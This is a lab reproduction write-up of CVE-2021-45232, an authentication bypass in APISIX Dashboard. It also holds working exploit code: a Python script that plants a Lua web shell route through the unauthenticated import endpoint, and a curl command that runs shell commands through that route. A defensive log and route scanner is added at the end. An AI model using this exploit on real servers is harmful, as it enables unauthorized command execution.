1. Vulnerability introduction
ID: CVE-2021-45232
Component: APISIX
Vulnerability type: authentication bypass
Impact: authentication bypass
Summary: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks: the framework 'droplet' is layered on top of the framework 'gin'. All APIs and the authentication middleware are developed on 'droplet', but some APIs use the 'gin' interface directly and therefore bypass authentication.
Affected versions:
apache: 2.7.0 < APISIX Dashboard < 2.10.1 (fixed in 2.10.1)
2. Vulnerability environment construction
git clone https://github.com/apache/apisix-docker
cd ./apisix-docker/example
First, modify the configuration items in this directory as shown in the figure: the `version` field is changed to 2, and the apisix-dashboard version is changed to 2.8.
# Download and start the environment
docker-compose up -d
Next, make some simple configurations to simulate a real environment.
Default login address: ip:9000
Default username/password: admin/admin
Switch to the Route option and select Create. The name is arbitrary (it will be used shortly); the target node is arbitrary, just go to the next step; keep clicking next and submit.
You can see our configuration on the Route interface.
3. Vulnerability verification
# Just access it directly
ip:port/apisix/admin/migrate/export
The configuration file is leaked here.
Looking closely, it is the route we just configured that has leaked.
4. Exploitation
The main exploitation flow is to attach an extended script to a route through the interface and execute system commands through it.
Here is a manual test first.
Note that the configuration file here can be modified: just add the script directly and then
visit http://ip:9000/test (test is the route name created above).
Enter the container to check. Note: the script does not end up executing in the container on port 9000 (the dashboard), but in the container on port 9080 that hosts apache/apisix, as shown in the figure.
OK, the next step is how to create a route configuration containing a malicious script.
The dashboard's import configuration function is used here.
Forge a configuration file based on the configuration obtained from the export endpoint.
import json
import random

import requests

url = "http://ip:port"  # dashboard address (placeholder, as in the article)

eval_config = {
    "Consumers": [],
    "Routes": [
        {
            "id": str(random.randint(100000000000000000, 1000000000000000000)),
            "create_time": 1641259840,
            "update_time": 1641260783,
            "uri": "/evil",
            "name": "evil",
            "methods": ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS", "CONNECT", "TRACE"],
            # inline Lua route script; it runs in the apisix data-plane worker, not the dashboard
            "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
            "upstream": {
                "nodes": [{"host": "1.1.1.1", "port": 8080, "weight": 1}],
                "timeout": {"connect": 6, "send": 6, "read": 6},
                "type": "roundrobin",
                "scheme": "http",
                "pass_host": "pass",
                "keepalive_pool": {"idle_timeout": 60, "requests": 1000, "size": 320}
            },
            "status": 1
        }
    ],
    "Services": [],
    "SSLs": [],
    "Upstreams": [],
    "Scripts": [],
    "GlobalPlugins": [],
    "PluginConfigs": []
}

data = json.dumps(eval_config).encode()

# POST the data:
# note that the CRC32 checksum must be appended (crc32 is the checksum trailer
# the export file format carries; its computation is not shown in the article)
files = {
    "file": ("data", data + crc32, "text/data")}
resp = requests.post(url + "/apisix/admin/migrate/import", files=files)
Attack directly:
curl http://ip:port/evil -H cmd:ls
As shown in the figure, the attack succeeds.
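As an added defender-side example (not code from the article), the following Python flags hits on the unauthenticated migrate endpoints in access-log lines and lists exported routes whose inline Lua script spawns a process; the log lines, the export JSON and the nginx-style log layout are constructed assumptions.

```python
import json
import re

# Constructed sample access-log lines in the common nginx layout (not from a real deployment)
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jan/2022:10:31:02 +0000] "GET /apisix/admin/migrate/export HTTP/1.1" 200 1842 "-" "curl/7.79.1"
10.0.0.5 - - [04/Jan/2022:10:31:09 +0000] "POST /apisix/admin/migrate/import HTTP/1.1" 200 52 "-" "python-requests/2.26.0"
10.0.0.7 - - [04/Jan/2022:10:32:00 +0000] "GET /apisix/admin/routes HTTP/1.1" 401 35 "-" "Mozilla/5.0"
"""

# Constructed export file in the shape the article shows: a Routes list, one entry carrying an inline script
SAMPLE_EXPORT = json.dumps({
    "Routes": [
        {"name": "test", "uri": "/test", "plugins": {}},
        {"name": "evil", "uri": "/evil",
         "script": "local f = io.popen(ngx.req.get_headers()['cmd'], 'r') ngx.say(f:read('*all'))"},
    ]
})

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)')
MIGRATE_PATHS = ("/apisix/admin/migrate/export", "/apisix/admin/migrate/import")
SHELL_CALLS = re.compile(r"\b(io\.popen|os\.execute)\b")


def migrate_hits(log_text):
    """Return (client, method, path) for each request to a migrate endpoint."""
    # Before 2.10.1 these handlers sit outside the droplet auth middleware, so any
    # hit from other than an operator's known host deserves a look.
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("path").split("?", 1)[0] in MIGRATE_PATHS:
            hits.append((m.group("client"), m.group("method"), m.group("path")))
    return hits


def risky_routes(export_text):
    """Return names of routes whose inline Lua script spawns a process."""
    # Route scripts run in the apisix data-plane worker (port 9080 in the lab), not
    # in the dashboard container, so this is where an implanted route lands.
    cfg = json.loads(export_text)
    return [r.get("name") or r.get("id") for r in cfg.get("Routes", [])
            if SHELL_CALLS.search(r.get("script", ""))]


if __name__ == "__main__":
    for hit in migrate_hits(SAMPLE_LOG):
        print("migrate endpoint hit:", hit)
    print("routes with shell-spawning scripts:", risky_routes(SAMPLE_EXPORT))
```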
5. Problems encountered
5.1 apisix-dashboard error: The manager-api and apache apisix are mismatched.
It seems that dashboard version 2.7 is not compatible with the latest version of apache apisix. Just change the dashboard to a version above 2.7. Here I changed it to version 2.8.
5.2 apisix-dashboard keeps spinning
Just refresh; don't sit there waiting foolishly (っ°Д °;)っ